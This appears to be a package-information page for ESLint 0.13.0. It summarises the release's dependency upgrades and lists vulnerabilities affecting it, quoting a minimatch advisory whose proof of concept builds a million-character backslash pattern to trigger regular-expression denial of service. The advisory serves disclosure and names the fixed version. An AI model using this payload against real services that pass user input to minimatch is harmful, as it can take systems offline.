ESLint version 0.13.0 brings several notable updates compared to its predecessor, version 0.12.0. A key highlight for developers is the updated dependencies, specifically the upgrade of escope from version ~1.0.0 to ^2.0.3 and espree from version ^1.6.0 to ^1.7.1. These upgrades signal improvements in the underlying JavaScript parsing and scope analysis engines, potentially leading to more accurate and reliable linting results. Furthermore, globals was updated from version ^4.0.0 to ^5.1.0, indicating expanded support for predefined global variables, reducing false positives related to undefined variables. Another added dependency is estraverse-fb":"^1.3.0.
The development dependencies also saw a change with the introduction of jsdoc":"^3.3.0-beta1" in the newer version. This suggest a higher focus on generating documentation or consuming jsdoc comments.
These changes collectively aim to improve ESLint's core functionality, making it a more powerful and accurate tool for maintaining code quality and consistency in JavaScript projects. Developers upgrading to version 0.13.0 can expect enhanced linting capabilities, with a broader understanding of JavaScript syntax and a more comprehensive set of predefined globals, contributing to a smoother and more efficient development workflow. Carefully evaluate the impact of these updates within your project to ensure compatibility.
All the vulnerabilities related to the version 0.13.0 of the package
Regular Expression Denial of Service in minimatch
Affected versions of minimatch are vulnerable to regular expression denial of service attacks when user input is passed into the pattern argument of minimatch(path, pattern).
var minimatch = require(“minimatch”);
// utility function for generating long strings
var genstr = function (len, chr) {
var result = “”;
for (i=0; i<=len; i++) {
result = result + chr;
}
return result;
}
var exploit = “[!” + genstr(1000000, “\\”) + “A”;
// minimatch exploit.
console.log(“starting minimatch”);
minimatch(“foo”, exploit);
console.log(“finishing minimatch”);
Update to version 3.0.2 or later.
minimatch ReDoS vulnerability
A vulnerability was found in the minimatch package. This flaw allows a Regular Expression Denial of Service (ReDoS) when calling the braceExpand function with specific arguments, resulting in a Denial of Service.